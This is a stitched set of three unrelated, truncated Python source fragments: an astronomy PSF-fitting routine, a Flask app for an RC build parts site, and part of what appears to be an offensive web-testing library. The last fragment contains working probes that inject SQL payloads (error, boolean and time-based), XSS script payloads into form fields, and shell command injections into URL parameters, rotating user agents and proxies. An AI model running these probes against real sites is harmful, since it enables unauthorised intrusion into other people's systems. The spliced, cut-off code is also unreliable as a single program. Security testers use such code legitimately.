guess1 = [area/2.,sigma/1.4,centroid+xtemp.size/5.]
guess2 = [area/2.,sigma/1.4,centroid-xtemp.size/5.]
guess = guess1 + guess2 + [pedestal]
## Testing:
#mod = sumfunc(guess, gaussian, gaussian, 3, 4, args1=(xtemp,), args2=(xtemp,))
#fitargs = (sumfunc, gaussian, gaussian, 3, 4, (xtemp,), (xtemp,), None, vec, 1./err**2)
#fitkw = dict(useindepvar=False, testfinite=False)
#chisq = errfunc(guess, *fitargs, **fitkw)
#thisfit = fmin(errfunc, guess, args=fitargs, kw=fitkw, full_output=True)
#mod2 = sumfunc(thisfit[0], gaussian, gaussian, 3, 4, args1=(xtemp,), args2=(xtemp,))
if verbose:
print '2-Gaussian guess parameters>>', guess
fitargs = (sumfunc, gaussian, gaussian, 3, 4, (xtemp,), (xtemp,), vec, 1./err**2)
fitkw = dict(useindepvar=False, testfinite=False)
fit = fmin(errfunc, guess, args=fitargs, kw=fitkw, full_output=True, disp=False, holdfixed=holdfixed)
if verbose:
model = sumfunc(fit[0], gaussian, gaussian, 3, 4, args1=(xtemp,), args2=(xtemp,))
model1 = gaussian(fit[0][0:3], xtemp)
model2 = gaussian(fit[0][3:6], xtemp)
print 'Best-fit parameters>>', fit[0]
f = plt.figure()
ax = plt.axes()
plt.plot(xtemp, vec, 'o', \
xtemp, model, '--')
plt.plot(xtemp, model1+fit[0][6], ':')
plt.plot(xtemp, model2+fit[0][6], ':')
return fit[0]
def fitPSF(ec, guessLoc, fitwidth=20, verbose=False, sigma=5, medwidth=6, err_ec=None):
"""
Helper function to fit 1D PSF near a given region. Assumes
spectrum runs horizontally across the frame!
ec : 2D numpy array
echellogram array, with horizontal dispersion direction
guessLoc : 2-tuple
A slight misnomer for this (x,y) tuple: y is a guess and will
be fit, but x is the coordinate at which the fitting takes
place.
fitwidth : int
width of cross-dispersion direction to use in fitting
medwidth : int
number of columns to average over when fitting a profile
verbose : bool
verbosity/debugging printout flag
sigma : scalar
sigma scale for clipping bad values
"""
# 2010-08-24 22:00 IJC: Added sigma option
# 2010-11-29 20:54 IJC: Added medwidth option
# 2011-11-26 | |
<filename>application.py<gh_stars>0
# -*- coding: utf-8 -*-
from cryptography.fernet import Fernet
from flask import Flask, render_template, Response, abort, session, request, url_for, flash, redirect
from flask.ext.github import GitHub, GitHubError
from flask_sslify import SSLify
import elasticsearch
import os
import os.path
import pylru
import base64
import copy
import requests
import json
import hmac
import math
import urllib
import urlparse
from hashlib import sha1
import collections
def update(d, u):
for k, v in u.iteritems():
if isinstance(v, collections.Mapping):
r = update(d.get(k, {}), v)
d[k] = r
else:
d[k] = u[k]
return d
# Init the rcbuild.info app.
rcbuild = Flask(__name__)
sslify = SSLify(rcbuild, skips=["healthz"])
rcbuild.config['GITHUB_CLIENT_ID'] = os.environ['GITHUB_CLIENT_ID']
rcbuild.config['GITHUB_CLIENT_SECRET'] = os.environ['GITHUB_CLIENT_SECRET']
rcbuild.config['GITHUB_BASE_URL'] = os.environ['GITHUB_BASE_URL']
rcbuild.config['GITHUB_AUTH_URL'] = os.environ['GITHUB_AUTH_URL']
rcbuild.config['PROPAGATE_EXCEPTIONS'] = True
rcbuild.config['PERMANENT_SESSION_LIFETIME'] = 365 * 24 * 60 * 60
rcbuild.secret_key = os.environ['SESSION_SECRET_KEY']
application = rcbuild
FERNET_KEY = os.environ['FERNET_KEY']
f = Fernet(FERNET_KEY)
es = elasticsearch.Elasticsearch([os.environ['ES_HOST']])
SILENT_COMMIT_MESSAGE = "Silently upgrade - "
partCategories_string = ""
partCategories = {}
buildSkeleton = {}
infoSkeleton = {}
github_cache = pylru.lrucache(64)
from git import Repo
github = GitHub(rcbuild)
SOCIAL_BOTS = ["facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)",
"facebookexternalhit/1.1",
"Mozilla/5.0 (compatible; redditbot/1.0; +http://www.reddit.com/feedback)",
"Twitterbot",
"Pinterest",
"Google (+https://developers.google.com/+/web/snippet/)",
"Mozilla/5.0 (compatible; Google-Structured-Data-Testing-Tool +http://developers.google.com/structured-data/testing-tool/)"]
def is_social_bot():
for bot in SOCIAL_BOTS:
if bot in request.user_agent.string:
return True
return False
def CloneOrPull():
r = None
if not os.path.isdir("parts-repo"):
r = Repo.clone_from("https://github.com/rcbuild-info/parts.git", "parts-repo")
else:
r = Repo("parts-repo")
fetch_info = r.remote().pull()
SMALL_PARTS_BY_ID = {}
SMALL_PARTS_BY_CATEGORY = {}
LINKS = {}
def addPart(dest, manufacturerID, partID, part):
if manufacturerID not in dest:
dest[manufacturerID] = {}
dest[manufacturerID][partID] = part
def updatePartIndexHelper():
CloneOrPull()
new_small_parts_by_id = {}
new_small_parts_by_category = {}
new_links = {}
for dirpath, dirnames, filenames in os.walk("parts-repo"):
manufacturerID = dirpath[len("parts-repo/"):]
for filename in filenames:
if not filename.endswith("json"):
continue
partID = filename[:-len(".json")]
full_path = os.path.join(dirpath, filename)
link = False
if os.path.islink(full_path):
link = True
full_path = os.path.realpath(full_path)
if not os.path.isfile(full_path):
continue
split = full_path.split("/")
if len(split) == 2:
m = split[-2]
p = split[-1][:-len(".json")]
addPart(new_links, manufacturerID, partID, (m, p[:-len(".json")]))
with open(full_path, "r") as f:
part = json.load(f)
part["id"] = manufacturerID + "/" + partID
small_part = {"manufacturer": part["manufacturer"],
"name": part["name"]}
if link:
small_part["link"] = True
categories = []
if "version" in part:
categories = part["categories"]
elif part["category"]:
categories = [part["category"]]
small_part["categories"] = categories
for category in categories:
if category not in new_small_parts_by_category:
new_small_parts_by_category[category] = {}
addPart(new_small_parts_by_category[category], manufacturerID, partID, small_part)
addPart(new_small_parts_by_id, manufacturerID, partID, small_part)
global SMALL_PARTS_BY_CATEGORY
global SMALL_PARTS_BY_ID
global LINKS
SMALL_PARTS_BY_CATEGORY = new_small_parts_by_category
SMALL_PARTS_BY_ID = new_small_parts_by_id
LINKS = new_links
@rcbuild.route('/update/partIndex', methods=["GET", "HEAD", "OPTIONS", "POST"])
def updatePartIndex():
# Don't update if we can't validate the requester.
if request.method == "GET":
github_response = github.request("GET", "user")
if github_response["id"] != 52649:
abort(403)
elif request.method == "POST":
h = hmac.new(os.environ['GITHUB_PART_HOOK_HMAC'], request.data, sha1)
if not hmac.compare_digest(request.headers["X-Hub-Signature"], u"sha1=" + h.hexdigest()):
abort(403)
updatePartIndexHelper()
return 'ok'
@rcbuild.route('/partIndex/by/<by>.json')
def partIndex(by):
if by == "category":
return Response(json.dumps(SMALL_PARTS_BY_CATEGORY),
content_type="application/json")
elif by == "id":
return Response(json.dumps(SMALL_PARTS_BY_ID),
content_type="application/json")
abort(404)
@rcbuild.route('/')
def index():
return render_template('main.html')
@rcbuild.route('/update/buildIndex', methods=["GET", "HEAD", "OPTIONS", "POST"])
def updateBuildIndex():
# Don't update if we can't validate the requester.
if request.method == "POST":
request_data = request.get_data()
push_info = json.loads(request_data)
if "name" not in push_info["repository"]["owner"]:
print("owner missing name")
print(push_info["repository"])
abort(403)
user = push_info["repository"]["owner"]["name"]
res = es.get(index='private', doc_type='githubsecret', id=user)
if not res["found"]:
print("couldn't find github secret")
abort(403)
h = hmac.new(str(res["_source"]["secret"]), request.data, sha1)
if not hmac.compare_digest(request.headers["X-Hub-Signature"], u"sha1=" + h.hexdigest()):
print("couldn't verify hmac")
abort(403)
branch = push_info["ref"][len("refs/heads/"):]
if user == "tannewt" and branch.startswith(("test", "Test")):
return Response('ok')
if branch.startswith("patch"):
return Response('ok')
# Ignore the push notification we get when a new branch is created.
if push_info["before"] == "0000000000000000000000000000000000000000" or len(push_info["commits"]) == 0:
print("Dropping notification of creation of " + push_info["ref"] + " in " + push_info["repository"]["full_name"])
return Response('ok')
res = None
try:
res = es.get(index='builds', doc_type='buildsnapshot', id=push_info["before"])
except elasticsearch.TransportError as e:
print("elastic search error fetching current", e, push_info["before"])
pass
current_snapshot = None
current_doc_id = {"_index": "builds", "_type": "buildsnapshot", "_id": push_info["before"]}
updating = False
if res and res["found"]:
current_snapshot = res["_source"]
updating = True
previous_snapshot = None
previous_doc_id = None
# We do a bulk update to the index to minimize update cost.
actions = []
for commit in push_info["commits"]:
# We bump the snapshot if settings or parts change but not other things
# such as flights. Flights will only impact snapshot stats, not structure.
if (current_snapshot == None or
("build.json" in commit["modified"] and
not commit["message"].startswith(SILENT_COMMIT_MESSAGE)) or
"cleanflight_cli_dump.txt" in commit["modified"] or
"cleanflight_gui_backup.txt" in commit["modified"] or
"cleanflight_cli_dump.txt" in commit["added"] or
"cleanflight_gui_backup.txt" in commit["added"]):
# Finalize the previous snapshot.
if previous_snapshot:
actions.append({"index": previous_doc_id})
actions.append(previous_snapshot)
previous_snapshot = current_snapshot
previous_doc_id = copy.copy(current_doc_id)
if previous_snapshot:
previous_snapshot["next_snapshot"] = commit["id"]
# Create a new snapshot.
current_snapshot = {
"timestamp": commit["timestamp"],
"user": user,
"branch": branch,
"previous_snapshot": previous_doc_id["_id"],
"commits": [],
"next_snapshot": None
}
elif updating:
# The id of a snapshot is the last commit so we delete the old current
# doc when a commit is added and load the previous snapshot so we can
# update its next.
actions.append({"delete": copy.copy(current_doc_id)})
if "previous_snapshot" in current_snapshot:
previous_doc_id = {"_index": "builds", "_type": "buildsnapshot", "_id": current_snapshot["previous_snapshot"]}
res = None
try:
res = es.get(index='builds', doc_type='buildsnapshot', id=previous_doc_id["_id"])
except elasticsearch.TransportError as e:
print("elastic search error fetching previous", e, previous_doc_id)
pass
if res and res["found"]:
previous_snapshot = res["_source"]
else:
previous_doc_id = None
if previous_snapshot:
previous_snapshot["next_snapshot"] = commit["id"]
if current_snapshot:
if "build" not in current_snapshot or "build.json" in commit["modified"] or "build.json" in commit["added"]:
r = github.raw_request("GET", "repos/" + user + "/rcbuild.info-builds/contents/build.json?ref=" + commit["id"], headers={"accept": "application/vnd.github.v3.raw"})
if r.status_code == requests.codes.ok:
current_snapshot["build"] = json.loads(r.text)
# Update to the latest info.
if "info" not in current_snapshot or "info.json" in commit["modified"] or "info.json" in commit["added"]:
r = github.raw_request("GET", "repos/" + user + "/rcbuild.info-builds/contents/info.json?ref=" + commit["id"], headers={"accept": "application/vnd.github.v3.raw"})
if r.status_code == requests.codes.ok:
current_snapshot["info"] = json.loads(r.text)
current_snapshot["commits"].append(commit["id"])
if not commit["message"].startswith(SILENT_COMMIT_MESSAGE):
current_snapshot["timestamp"] = commit["timestamp"]
current_doc_id["_id"] = commit["id"]
updating = False
if previous_snapshot:
actions.append({"index": previous_doc_id})
actions.append(previous_snapshot)
if current_snapshot:
actions.append({"index": current_doc_id})
actions.append(current_snapshot)
es.bulk(index='builds', doc_type='buildsnapshot', body=actions)
return Response('ok')
def filtered_shoulds(f, shoulds, size=5, sort=None, from_=0):
query = {"query": {"filtered": {"filter": f, "query": {"bool": {"should": shoulds}}}}, "size": size, "from": from_}
if sort:
query["sort"] = sort
return query
@rcbuild.route('/similar/builds/<user>/<branch>')
def similar_builds(user, branch):
ref = None
if "commit" in request.args:
ref = request.args["commit"]
else:
ref = "refs/heads/" + urllib.quote_plus(branch.encode('utf8'))
build = get_github("repos/" + user + "/rcbuild.info-builds/contents/build.json?ref=" + ref, {"accept": "application/vnd.github.v3.raw"}, use_cache_even_when_logged_in=True)
if build.status_code != requests.codes.ok:
return Response(status=requests.codes.server_error)
build = json.loads(build.get_data(True))
not_this_build = {"bool": {"must": [{"term": {"user": user}}, {"term": {"branch": branch}}]}}
shoulds = []
for category in build["config"]:
t = "term"
term = {category: {"value": build["config"][category]}}
if isinstance(build["config"][category], list):
t = "terms"
term = {category: build["config"][category]}
if category in partCategories["categories"] and "similarBoost" in partCategories["categories"][category]:
if t == "term":
term[category]["boost"] = partCategories["categories"][category]["similarBoost"]
else:
term["boost"] = partCategories["categories"][category]["similarBoost"]
shoulds.append({t: term})
searches = []
other_musts = {"missing": {"field": "next_snapshot"}}
other_size = 10
if "u" in request.cookies:
searches.append({"index": "builds", "doc_type": "buildsnapshot"})
f = {"bool":
{"must": [{"missing": {"field": "next_snapshot"}},
{"term": {"user": request.cookies["u"]}}],
"must_not" : not_this_build
}}
other_musts = [other_musts,
{"not": {"term": {"user": request.cookies["u"]}}}]
searches.append(filtered_shoulds(f, shoulds))
other_size = 5
searches.append({"index": "builds", "doc_type": "buildsnapshot"})
f = {"bool":
{"must": other_musts,
"must_not" : not_this_build
}}
searches.append(filtered_shoulds(f, shoulds, size=other_size))
res = es.msearch(body=searches)
response = {}
if len(res["responses"]) > 1:
response["yours"] = []
for hit in res["responses"][0]["hits"]["hits"]:
hit = hit["_source"]
response["yours"].append({"user": hit["user"], "branch": hit["branch"]})
response["others"] = []
for hit in res["responses"][len(res["responses"]) - 1]["hits"]["hits"]:
hit = hit["_source"]
response["others"].append({"user": hit["user"], "branch": hit["branch"]})
return Response(json.dumps(response))
def get_part(partID):
if "/" not in partID:
return None
split = partID.rsplit("/", 1)
manufacturerID = split[0]
partID = split[1]
while manufacturerID in LINKS and partID in LINKS[manufacturerID]:
manufacturerID = LINKS[manufacturerID][partID][0]
partID = LINKS[manufacturerID][partID][1]
if manufacturerID in SMALL_PARTS_BY_ID and partID in SMALL_PARTS_BY_ID[manufacturerID]:
return SMALL_PARTS_BY_ID[manufacturerID][partID]
return None
def get_part_name(partID):
part = get_part(partID)
if part:
return part["manufacturer"] + " " + part["name"]
return partID
def get_build_snippet(build):
parts = ["frame", "motor", "esc", "fc"]
parts = [get_part_name(build["build"]["config"][x]) for x in parts]
part_snippet = u" · ".join([x for x in parts if x != ""])
snippet = {"user" : build["user"],
"branch" : build["branch"],
"snippet": part_snippet}
if "info" in build and "media" in build["info"]:
if len(build["info"]["media"]["photos"]) > 0 and not (len(build["info"]["media"]["photos"]) == 1 and build["info"]["media"]["photos"][0]["imgur"]["imageId"] == ""):
snippet["thumb"] = build["info"]["media"]["photos"][-1]
elif len(build["info"]["media"]["videos"]) > 0 and not (len(build["info"]["media"]["videos"]) == 1 and build["info"]["media"]["videos"][0]["youtube"]["videoId"] == ""):
snippet["thumb"] = build["info"]["media"]["videos"][-1]
return snippet
@rcbuild.route('/list/builds', defaults={"page": 1}, methods=["GET", "HEAD", "OPTIONS", "POST"])
@rcbuild.route('/list/builds/<page>', methods=["GET", "HEAD", "OPTIONS", "POST"])
def list_builds(page):
if request.method != "POST":
return Response(status=requests.codes.method_not_allowed)
partIDs = json.loads(request.data)
shoulds = []
for partID in partIDs:
part = get_part(partID)
categories = part["categories"]
if len(categories) == 0:
categories = partCategories["categories"]
for c in | |
#coding: utf-8
import subprocess,os,xtelnet
import requests,socket,random,time,ssl
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import bs4
from bs4 import BeautifulSoup
from bane.payloads import *
from bane.pager import inputs
def sqli_error_based(u,logs=True,user_agent=None,returning=False,timeout=10,proxy=None,cookie=None):
'''
this function is to test a given link to check it the target is vulnerable to SQL Injection or not by adding "'" at the end of the line and
check the response body for any SQL syntax errors.
it's an "Error Based SQL Injection" test.
the function takes 4 arguments:
u: the link to check
logs: (set by default to: True) showing the process and the report, you can turn it off by setting it to:False
returning: (set by default to: False) returning an integer indecating the result of the test:
usage:
>>>import bane
>>>l='http://www.example.com/product.php?id=2'
>>>bane.sqlieb(domain)
if returning was set to: True
False => not vulnerable
True => vulnerable
timeout: (set by default to: 10) timeout flag for the request
'''
s=False
if proxy:
proxy={'http':'http://'+proxy}
if user_agent:
us=user_agent
else:
us=random.choice(ua)
if cookie:
hea={'User-Agent': us,'Cookie':cookie}
else:
hea={'User-Agent': us}
if logs==True:
print("[*]Error Based SQL Injection test")
try:
u+="'"
rp= requests.get(u,headers = hea,proxies=proxy,timeout=timeout,verify=False)
r=rp.text
if (('SQL command not properly ended' in r) or ('Query failed: ERROR: syntax error at or near' in r) or ('Unclosed quotation mark before the character string' in r) or ("You have an error in your SQL syntax" in r) or ("quoted string not properly terminated" in r) or ("mysql_fetch_array(): supplied argument is not a valid MySQL result resource in"in r)):
s=True
except Exception as e:
pass
if logs==True:
if s==False:
print("[-]Not vulnerable")
if s==True:
print("[+]Vulnerable!!!")
if returning==True:
return s
def sqli_boolean_based(u,logs=True,returning=False,timeout=10,proxy=None,user_agent=None,cookie=None):
'''
this function is to test a given link to check it the target is vulnerable to SQL Injection or not by adding boolean opertations to the link
and check the response body for any change.
it's an "Boolean Based SQL Injection" test.
the function takes 4 arguments:
u: the link to check
logs: (set by default to: True) showing the process and the report, you can turn it off by setting it to:False
returning: (set by default to: False) returning an integer indecating the result of the test:
usage:
>>>import bane
>>>l='http://www.example.com/product.php?id=2'
>>>bane.sqlibb(domain)
if returning was set to: True
False => not vulnerable
True => vulnerable
timeout: (set by default to: 10) timeout flag for the request
'''
if proxy:
proxy={'http':'http://'+proxy}
s=False
if user_agent:
us=user_agent
else:
us=random.choice(ua)
if cookie:
hea={'User-Agent': us,'Cookie':cookie}
else:
hea={'User-Agent': us}
try:
if logs==True:
print("[*]Boolean Based SQL Injection test")
r=requests.get(u+" and 1=2",headers=hea,proxies=proxy,timeout=timeout, verify=False)
q=requests.get(u+" and 1=1",headers=hea,proxies=proxy,timeout=timeout, verify=False)
r1=r.text
q1=q.text
if ((r.status_code==200)and(q.status_code==200)):
if ((r1!=q1) and (("not found" not in r1.lower()) and ("not found" not in q1.lower()))):
s=True
except:
pass
if logs==True:
if s==False:
print("[-]Not vulnerable")
if s==True:
print("[+]Vulnerable!!!")
if returning==True:
return s
def sqli_time_based(u,delay=15,db="mysql",logs=True,returning=False,timeout=25,proxy=None,user_agent=None,cookie=None):
'''
this function is to test a given link to check it the target is vulnerable to SQL Injection or not by adding a delay statement at the end
of the line and check the delay of the response.
it's an "Time Based SQL Injection" test.
the function takes 5 arguments:
u: the link to check
delay: time giving as a delay for the database to do before returning the response
logs: (set by default to: True) showing the process and the report, you can turn it off by setting it to:False
returning: (set by default to: False) returning an integer indecating the result of the test:
usage:
>>>import bane
>>>l='http://www.example.com/product.php?id=2'
>>>bane.sqlitb(domain)
if returning was set to: True
False => not vulnerable
True => vulnerable
timeout: (set by default to: 25) timeout flag for the request
'''
if proxy:
proxy={'http':'http://'+proxy}
if user_agent:
us=user_agent
else:
us=random.choice(ua)
if cookie:
hea={'User-Agent': us,'Cookie':cookie}
else:
hea={'User-Agent': us}
s=False
if db.lower()=="mysql":
sle="-SLEEP({})".format(delay)
if db.lower()=="sql":
sle="; WAIT FOR DELAY '00:00:{}'".format(delay)
if db.lower()=="oracle":
sle="BEGIN DBMS_LOCK.SLEEP({}); END;".format(delay)
else:
return None
try:
if logs==True:
print("[*]Time Based SQL Injection test")
t=time.time()
r=requests.get(u+sle,headers=hea,proxies=proxy,timeout=timeout, verify=False)
if ((time.time()-t>=delay)and (r.status_code==200)):
s=True
except:
pass
if logs==True:
if s==False:
print("[-]Not vulnerable")
if s==True:
print("[+]Vulnerable!!!")
if returning==True:
return s
def xss_get(u,pl,user_agent=None,extra=None,timeout=10,proxy=None,cookie=None):
'''
this function is for xss test with GET requests.
it takes the 4 arguments:
u: link to test
pl: dictionary contains the paramter and the xss payload
extra: if the request needs additionnal parameters you can add them there in dictionary format {param : value}
timeout: timeout flag for the request
'''
if user_agent:
us=user_agent
else:
us=random.choice(ua)
if cookie:
hea={'User-Agent': us,'Cookie':cookie}
else:
hea={'User-Agent': us}
if proxy:
proxy={'http':'http://'+proxy}
for x in pl:
xp=pl[x]
d={}
if extra:
d.update(extra)
d.update(pl)
try:
c=requests.get(u, params= pl,headers = hea,proxies=proxy,timeout=timeout, verify=False).text
if xp in c:
return True
except Exception as e:
pass
return False
def xss_post(u,pl,user_agent=None,extra=None,timeout=10,proxy=None,cookie=None):
'''
this function is for xss test with POST requests.
it takes the 4 arguments:
u: link to test
pl: dictionary contains the paramter and the xss payload
extra: if the request needs additionnal parameters you can add them there in dictionary format {param : value}
timeout: timeout flag for the request
'''
if user_agent:
us=user_agent
else:
us=random.choice(ua)
if cookie:
hea={'User-Agent': us,'Cookie':cookie}
else:
hea={'User-Agent': us}
if proxy:
proxy={'http':'http://'+proxy}
for x in pl:
xp=pl[x]
d={}
if extra:
d.update(extra)
d.update(pl)
try:
c=requests.post(u, data= d,headers = hea,proxies=proxy,timeout=timeout, verify=False).text
if xp in c:
return True
except Exception as e:
pass
return False
def xss(u,payload=None,fresh=False,get=True,post=True,logs=True,returning=False,proxy=None,proxies=None,timeout=10,user_agent=None,cookie=None):
'''
this function is for xss test with both POST and GET requests. it extracts the input fields names using the "inputs" function then test each input using POST and GET methods.
it takes the following arguments:
u: link to test
payload: the xss payload to use it, if it's set to: None (set by default to: None) it uses the default payload
get: (set by default to: True) to test the parameter using GET
post: (set by default to: True) to test the parameter using POST
logs: (set by default to: True) show the process
returning: (set by dfault to: False) to return scan results of the parameters as list of strings
usage:
>>>import bane
>>>bane.xss('http://www.example.com/")
>>>bane.xss('http://www.example.com/',payload="<script>alert(123);</script>")
'''
global stop
stop=False
if proxy:
proxy=proxy
if proxies:
proxy=random.choice(proxies)
lst=[]
if payload:
xp=payload
else:
xp='<script>alert("Vulnerable!!!");</script>'
if logs==True:
print("Getting parameters...")
hu=True
l1=inputs(u,proxy=proxy,timeout=timeout,value=True,cookie=cookie,user_agent=user_agent)
if len(l1)==0:
if logs==True:
print("No parameters were found!!!")
hu=False
if hu==True:
extr=[]
l=[]
for x in l1:
if (x.split(':')[1]!=''):
extr.append(x)
else:
l.append(x)
for x in extr:
if x.split(':')[0] in l:
extr.remove(x)
if logs==True:
print("Test has started...\nPayload:\n"+xp)
if '?' in u:
u=u.split('?')[0].split(',')[0]
for i in l:
if stop==True:
break
user=None
i=i.split(':')[0]
try:
if proxies:
proxy=random.choice(proxies)
pl={i : xp}
extra={}
if len(extr)!=0:
for x in extr:
a=x.split(':')[0]
b=x.split(':')[1]
extra.update({a:b})
if get==True:
if fresh==True:
if stop==True:
break
extr=[]
user=random.choice(ua)
k=inputs(u,user_agent=user,proxy=proxy,timeout=timeout,value=True,cookie=cookie)
for x in k:
if (x.split(':')[1]!=''):
extr.append(x)
for x in extr:
if x.split(':')[0] in l:
extr.remove(x)
extra={}
if len(extr)!=0:
for x in extr:
a=x.split(':')[0]
b=x.split(':')[1]
extra.update({a:b})
if stop==True:
break
if xss_get(u,pl,user_agent=user,extra=extra,proxy=proxy,timeout=timeout,cookie=cookie)==True:
x="parameter: "+i+" method: GET=> [+]Payload was found"
else:
x="parameter: "+i+" method: GET=> [-]Payload was not found"
lst.append(x)
if logs==True:
print (x)
if post==True:
if fresh==True:
if stop==True:
break
extr=[]
user=random.choice(ua)
k=inputs(u,user_agent=user,proxy=proxy,timeout=timeout,value=True,cookie=cookie)
for x in k:
if (x.split(':')[1]!=''):
extr.append(x)
for x in extr:
if x.split(':')[0] in l:
extr.remove(x)
extra={}
if len(extr)!=0:
for x in extr:
a=x.split(':')[0]
b=x.split(':')[1]
extra.update({a:b})
if stop==True:
break
if xss_post(u,pl,user_agent=user,extra=extra,proxy=proxy,timeout=timeout,cookie=cookie)==True:
x="parameter: "+i+" method: POST=> [+]Payload was found"
else:
x="parameter: "+i+" method: POST=> [-]Payload was not found"
lst.append(x)
if logs==True:
print (x)
except:
break
if returning==True:
return lst
def command_exec_link(u,timeout=10,proxy=None,logs=True,returning=False,user_agent=None,cookie=None):
'''
this function is for command execution test using a given link
'''
s=False
if proxy:
proxy={'http':'http://'+proxy}
if user_agent:
us=user_agent
else:
us=random.choice(ua)
if cookie:
hea={'User-Agent': us,'Cookie':cookie}
else:
hea={'User-Agent': us}
u+='; echo alaistestingyoursystem'
try:
r=requests.get(u,headers = hea,proxies=proxy,timeout=timeout, verify=False)
if (r.status_code==200):
if ("alaistestingyoursystem" in r.text):
s=True
except:
pass
if logs==True:
if s==True:
print("[+]Vulnerable!!!")
else:
print("[-]Not vulnerable")
if returning==True:
return s
def command_exec_get(u,param='',value='',extra=None,timeout=10,proxy=None,user_agent=None,cookie=None):
'''
this function is for command execution test using a given link and GET parameter
'''
value+=";echo alaistestingyoursystem"
if user_agent:
us=user_agent
else:
us=random.choice(ua)
if cookie:
hea={'User-Agent': us,'Cookie':cookie}
else:
hea={'User-Agent': us}
pl={param:value}
if extra:
pl.update(extra)
try:
r=requests.get(u,params=pl,headers = hea,proxies=proxy,timeout=timeout, verify=False)
if |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.